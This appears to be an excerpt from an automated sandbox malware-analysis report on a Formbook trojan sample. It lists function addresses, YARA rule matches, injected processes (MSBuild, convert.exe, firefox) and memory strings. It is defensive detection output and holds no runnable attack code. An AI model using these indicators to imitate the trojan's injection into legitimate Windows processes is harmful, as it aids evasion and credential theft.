Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090E59	8_2_01090E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114CE93	8_2_0114CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A2E90	8_2_010A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01099EB0	8_2_01099EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114EEDB	8_2_0114EEDB
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D48A4A	10_2_02D48A4A
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D51075	10_2_02D51075
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D5107A	10_2_02D5107A
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4A9CA	10_2_02D4A9CA
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D489F2	10_2_02D489F2
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D67FDA	10_2_02D67FDA
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4A7AA	10_2_02D4A7AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EA352	11_2_037EA352
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0371D34C	11_2_0371D34C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E132D	11_2_037E132D
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373E3F0	11_2_0373E3F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F03E6	11_2_037F03E6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0377739A	11_2_0377739A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D0274	11_2_037D0274
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D12ED	11_2_037D12ED
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374B2C0	11_2_0374B2C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037352A0	11_2_037352A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0371F172	11_2_0371F172
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037FB16B	11_2_037FB16B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0376516C	11_2_0376516C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037B8158	11_2_037B8158
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CA118	11_2_037CA118
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03720100	11_2_03720100
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E81CC	11_2_037E81CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373B1B0	11_2_0373B1B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F01AA	11_2_037F01AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E70E9	11_2_037E70E9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF0E0	11_2_037EF0E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DF0CC	11_2_037DF0CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037370C0	11_2_037370C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730770	11_2_03730770
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03754750	11_2_03754750
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037217EC	11_2_037217EC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372C7C0	11_2_0372C7C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF7B0	11_2_037EF7B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374C6E0	11_2_0374C6E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E16CC	11_2_037E16CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7571	11_2_037E7571
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730535	11_2_03730535
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CD5B0	11_2_037CD5B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F0591	11_2_037F0591
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03721460	11_2_03721460
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E2446	11_2_037E2446
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF43F	11_2_037EF43F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DE4F6	11_2_037DE4F6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFB76	11_2_037EFB76
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A5BF0	11_2_037A5BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0376DBF9	11_2_0376DBF9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E6BD7	11_2_037E6BD7
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374FB80	11_2_0374FB80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A3A6C	11_2_037A3A6C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFA49	11_2_037EFA49
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7A46	11_2_037E7A46
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DDAC6	11_2_037DDAC6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CDAAC	11_2_037CDAAC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03775AA0	11_2_03775AA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372EA80	11_2_0372EA80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03746962	11_2_03746962
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03739950	11_2_03739950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374B950	11_2_0374B950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037329A0	11_2_037329A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037FA9A6	11_2_037FA9A6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373A840	11_2_0373A840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0379D800	11_2_0379D800
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0375E8F0	11_2_0375E8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037338E0	11_2_037338E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037168B8	11_2_037168B8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A4F40	11_2_037A4F40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03750F30	11_2_03750F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03772F28	11_2_03772F28
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFF09	11_2_037EFF09
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373CFE0	11_2_0373CFE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03722FC8	11_2_03722FC8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFFB1	11_2_037EFFB1
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03731F92	11_2_03731F92
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730E59	11_2_03730E59
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EEE26	11_2_037EEE26
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EEEDB	11_2_037EEEDB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03739EB0	11_2_03739EB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03742E90	11_2_03742E90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037ECE93	11_2_037ECE93
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7D73	11_2_037E7D73
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E1D5A	11_2_037E1D5A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03733D40	11_2_03733D40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373AD00	11_2_0373AD00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372ADE0	11_2_0372ADE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374FDC0	11_2_0374FDC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03748DBF	11_2_03748DBF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A9C32	11_2_037A9C32
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730C00	11_2_03730C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03720CF2	11_2_03720CF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D0CB5	11_2_037D0CB5
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030116D0	11_2_030116D0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0302A120	11_2_0302A120
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030131BB	11_2_030131BB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030131C0	11_2_030131C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300CB10	11_2_0300CB10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300AB90	11_2_0300AB90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300C8F0	11_2_0300C8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CB208	11_2_035CB208
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CC1A8	11_2_035CC1A8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA45B	11_2_035CA45B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA4BF	11_2_035CA4BF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA4BA	11_2_035CA4BA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CBE06	11_2_035CBE06
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CBCE8	11_2_035CBCE8
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5CC25	13_2_04B5CC25
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B63765	13_2_04B63765
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B7C1B5	13_2_04B7C1B5
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5E985	13_2_04B5E985
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B65255	13_2_04B65255
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B65250	13_2_04B65250
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5EBA5	13_2_04B5EBA5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0110F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010FEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0107B970 appears 271 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010D7E54 appears 94 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 03765130 appears 36 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0371B970 appears 271 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0379EA12 appears 86 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 03777E54 appears 94 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 037AF290 appears 105 times

Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.0000000003170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293336090.0000000003050000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe

Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, TaskParameter.cs	Task registration methods: 'CreateNewTaskItemFrom'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, OutOfProcTaskHostNode.cs	Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, TaskLoader.cs	Task registration methods: 'CreateTask'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, RegisteredTaskObjectCacheBase.cs	Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'

Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: *.sln
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
